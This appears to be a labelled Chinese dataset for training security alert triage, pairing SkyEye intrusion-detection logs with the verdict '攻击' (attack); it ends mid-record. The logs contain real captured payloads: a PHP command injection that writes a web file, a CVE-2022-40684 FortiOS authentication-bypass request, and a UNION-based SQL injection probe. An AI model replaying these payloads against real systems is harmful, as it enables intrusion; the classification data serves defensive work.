"PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 12874}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "4f37e888f36b870236c4182b407092a0", "rule_key": "webids", "api": "218.76.15.56:30001/web/addons/ftp_download.php", "first_access_time": "2024-11-27 14:16:58", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "eb65960f241bb83d95058d48e2765e2b", "xff": "", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688198", "code_language": "PHP", "public_date": "2020-11-25 19:53:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/web/addons/ftp_download.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b70", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvd2ViL2FkZG9ucy9mdHBfZG93bmxvYWQucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDEwMg0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "YWN0aW9uPXN0b3Bfam9icyZ0YXNrbmFtZT0nO2VjaG8gJzw/cGhwIGVjaG8gbWQ1KCJvb2FoaiIpO3VubGluayhfX0ZJTEVfXyk7Pz4nID4gL3Zhci93d3cvdmdzbGtzLnBocDsn", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_dcb4ab9b6fec09266454c80e449d00ee", "access_time": "2024-11-27 14:16:58", "content-length": "102", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/web/addons/ftp_download.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "ftp_download.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /web/addons/ftp_download.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 102\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "action=stop_jobs&taskname=';echo '<?php echo md5(\"ooahj\");unlink(__FILE__);?>' > /var/www/vgslks.php;'", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "sport": "12874", "h_url": "/web/addons/ftp_download.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688218", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688218, "vuln_harm": "", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 31, "uri": "/web/addons/ftp_download.php", "dport": 30001, "vuln_name": "WebUI 1.5b6 /mainfile.php 远程代码执行漏洞", "rsp_status": 0, "code_language": "其他", "solution": "请及时升级产品版本。", "hit_start": 11, "detail_info": "This indicates an attack attempt to exploit a Command Injection vulnerability in PHP. The vulnerability is due to insufficient validation on users' supplied inputs in the application when handling malicious requests. A remote attacker may be able to exploit this to execute arbitrary commands in the affected machine via crafted requests.", "xff": "", "sip": "223.160.174.104", "vuln_desc": "This indicates an attack attempt to exploit a Command Injection vulnerability in PHP. The vulnerability is due to insufficient validation on users' supplied inputs in the application when handling malicious requests. A remote attacker may be able to exploit this to execute arbitrary commands in the affected machine via crafted requests.", "public_date": "2018-11-14 00:00:00", "sport": 12874}, "detail_info": "This indicates an attack attempt to exploit a Command Injection vulnerability in PHP. The vulnerability is due to insufficient validation on users' supplied inputs in the application when handling malicious requests. A remote attacker may be able to exploit this to execute arbitrary commands in the affected machine via crafted requests.", "file_md5": "4f37e888f36b870236c4182b407092a0", "rule_key": "webids", "api": "218.76.15.56:30001/web/addons/ftp_download.php", "first_access_time": "2024-11-27 14:16:58", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "WebUI 1.5b6 /mainfile.php 远程代码执行漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "0d9aaa8e34a34cb38e612705741ab93f", "xff": "", "vuln_desc": "This indicates an attack attempt to exploit a Command Injection vulnerability in PHP. The vulnerability is due to insufficient validation on users' supplied inputs in the application when handling malicious requests. A remote attacker may be able to exploit this to execute arbitrary commands in the affected machine via crafted requests.", "attack_chain": "0x02010000", "vuln_harm": "", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688198", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "31", "h_proto_version": "HTTP/1.1", "uri": "/web/addons/ftp_download.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10000e56", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "WebUI 1.5b6 /mainfile.php 远程代码执行漏洞", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请及时升级产品版本。", "hit_start": "11", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvd2ViL2FkZG9ucy9mdHBfZG93bmxvYWQucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDEwMg0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "YWN0aW9uPXN0b3Bfam9icyZ0YXNrbmFtZT0nO2VjaG8gJzw/cGhwIGVjaG8gbWQ1KCJvb2FoaiIpO3VubGluayhfX0ZJTEVfXyk7Pz4nID4gL3Zhci93d3cvdmdzbGtzLnBocDsn", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_b5eb7e0fb4543de8d7372821c3457ba6", "access_time": "2024-11-27 14:16:58", "content-length": "102", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/web/addons/ftp_download.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "ftp_download.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /web/addons/ftp_download.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 102\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "action=stop_jobs&taskname=';echo '<?php echo md5(\"ooahj\");unlink(__FILE__);?>' > /var/www/vgslks.php;'", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268439126-WebUI 1.5b6 /mainfile.php 远程代码执行漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12874", "h_url": "/web/addons/ftp_download.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688214", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "非授权访问/权限绕过", "_origin": {"write_date": 1732688214, "vuln_harm": "作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 18, "uri": "/api/v2/cmdb/system/admin/admin", "dport": 30001, "vuln_name": "Fortinet FortiOS 身份验证绕过漏洞(CVE-2022-40684)", "rsp_status": 0, "code_language": "", "solution": "目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:\r\n\r\nhttps://www.fortinet.com/products/fortigate/fortios", "hit_start": 0, "detail_info": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。", "public_date": "2022-10-17 10:22:56", "sport": 12881}, "detail_info": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/api/v2/cmdb/system/admin/admin", "first_access_time": "2024-11-27 14:16:54", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "PUT", "sip_addr": "中国--北京市--北京市", "dnt": "1", "forwarded": "for=\"[127.0.0.1]:8888\";by=\"[127.0.0.1]:8888\"", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Fortinet FortiOS 身份验证绕过漏洞(CVE-2022-40684)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "db4f8aa6556c84db1800c3f2b1069dcd", "xff": "", "vuln_desc": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。", "attack_chain": "0x02010000", "vuln_harm": "作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688193", "code_language": "", "public_date": "2022-10-17 10:22:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "18", "h_proto_version": "HTTP/1.1", "uri": "/api/v2/cmdb/system/admin/admin", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021315", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Report Runner", "vlan_id": "", "vuln_type": "Fortinet FortiOS 身份验证绕过漏洞(CVE-2022-40684)", "attack_type": "非授权访问/权限绕过", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:\r\n\r\nhttps://www.fortinet.com/products/fortigate/fortios", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UFVUIC9hcGkvdjIvY21kYi9zeXN0ZW0vYWRtaW4vYWRtaW4gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogUmVwb3J0IFJ1bm5lcg0KQ29udGVudC1MZW5ndGg6IDM0DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uDQpEbnQ6IDENCkZvcndhcmRlZDogZm9yPSJbMTI3LjAuMC4xXTo4ODg4IjtieT0iWzEyNy4wLjAuMV06ODg4OCINClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "eyJzc2gtcHVibGljLWtleTEiOiAiZ2xobWVxZXFkdyJ9Cg==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_3a480a1ea36770cf0c80789e45389863", "access_time": "2024-11-27 14:16:54", "content-length": "34", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16040000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/json", "sip": "223.160.174.104", "dimension": "3", "url_path": "/api/v2/cmdb/system/admin/admin", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Report Runner\r\nContent-Length: 34\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/json\r\nDnt: 1\r\nForwarded: for=\"[127.0.0.1]:8888\";by=\"[127.0.0.1]:8888\"\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "{\"ssh-public-key1\": \"glhmeqeqdw\"}\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571413-Fortinet FortiOS 身份验证绕过漏洞(CVE-2022-40684)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "12881", "h_url": "/api/v2/cmdb/system/admin/admin"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688214", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688214, "vuln_harm": "Fortinet FortiOS系统存在远程代码执行漏洞,攻击者通过该漏洞可以获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 16, "uri": "/api/v2/cmdb/system/admin/admin", "dport": 30001, "vuln_name": "Fortinet FortiOS系统远程命令执行漏洞", "rsp_status": 0, "code_language": "", "solution": "1、请尽快升级到最新安全版本。", "hit_start": 0, "detail_info": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统,为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy为网站和基于云的应用程序提供安全Web网关、安全功能、无与伦比的性能以及最佳用户体验。Fortinet FortiOS系统存在远程代码执行漏洞,攻击者通过该漏洞可以获取服务器权限。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统,为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy为网站和基于云的应用程序提供安全Web网关、安全功能、无与伦比的性能以及最佳用户体验。Fortinet FortiOS系统存在远程代码执行漏洞,攻击者通过该漏洞可以获取服务器权限。", "public_date": "2022-11-24 17:17:42", "sport": 12881}, "detail_info": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统,为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy为网站和基于云的应用程序提供安全Web网关、安全功能、无与伦比的性能以及最佳用户体验。Fortinet FortiOS系统存在远程代码执行漏洞,攻击者通过该漏洞可以获取服务器权限。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/api/v2/cmdb/system/admin/admin", "first_access_time": "2024-11-27 14:16:54", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "PUT", "sip_addr": "中国--北京市--北京市", "dnt": "1", "forwarded": "for=\"[127.0.0.1]:8888\";by=\"[127.0.0.1]:8888\"", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Fortinet FortiOS系统远程命令执行漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "89484a15388ae38a3813fff4841c0fa5", "xff": "", "vuln_desc": "Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统,为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy为网站和基于云的应用程序提供安全Web网关、安全功能、无与伦比的性能以及最佳用户体验。Fortinet FortiOS系统存在远程代码执行漏洞,攻击者通过该漏洞可以获取服务器权限。", "attack_chain": "0x02020000", "vuln_harm": "Fortinet FortiOS系统存在远程代码执行漏洞,攻击者通过该漏洞可以获取服务器权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688193", "code_language": "", "public_date": "2022-11-24 17:17:42", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "16", "h_proto_version": "HTTP/1.1", "uri": "/api/v2/cmdb/system/admin/admin", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100213b5", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Report Runner", "vlan_id": "", "vuln_type": "Fortinet FortiOS系统远程命令执行漏洞", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、请尽快升级到最新安全版本。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UFVUIC9hcGkvdjIvY21kYi9zeXN0ZW0vYWRtaW4vYWRtaW4gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogUmVwb3J0IFJ1bm5lcg0KQ29udGVudC1MZW5ndGg6IDM0DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uDQpEbnQ6IDENCkZvcndhcmRlZDogZm9yPSJbMTI3LjAuMC4xXTo4ODg4IjtieT0iWzEyNy4wLjAuMV06ODg4OCINClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "eyJzc2gtcHVibGljLWtleTEiOiAiZ2xobWVxZXFkdyJ9Cg==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_460f9a8c924d28f4b748503685b43195", "access_time": "2024-11-27 14:16:54", "content-length": "34", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/json", "sip": "223.160.174.104", "dimension": "3", "url_path": "/api/v2/cmdb/system/admin/admin", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Report Runner\r\nContent-Length: 34\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/json\r\nDnt: 1\r\nForwarded: for=\"[127.0.0.1]:8888\";by=\"[127.0.0.1]:8888\"\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "{\"ssh-public-key1\": \"glhmeqeqdw\"}\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571573-Fortinet FortiOS系统远程命令执行漏洞", "rule_labels": "{\"0x100106\": {\"parent_id\": \"0x100100\", \"type\": \"设备类型\", \"name\": \"安全设备\", \"parent_name\": \"设备安全\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "12881", "h_url": "/api/v2/cmdb/system/admin/admin"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688212", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688212, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23", "dport": 30001, "vuln_name": "SQL注入攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 0, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2020-11-25 19:52:52", "sport": 12876}, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/index.php", "id": "103 UNION ALL SELECT CONCAT(md5(205139571))#", "first_access_time": "2024-11-27 14:16:52", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "efbace0eafbf2e5a2781c945546f4ebc", "xff": "", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688191", "code_language": "", "public_date": "2020-11-25 19:52:52", "skyeye_serial_num": "QbJK/8ze/", "a": "showcate", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23", "m": "Goods", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b69", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入攻击(机器学习)", "attack_type": 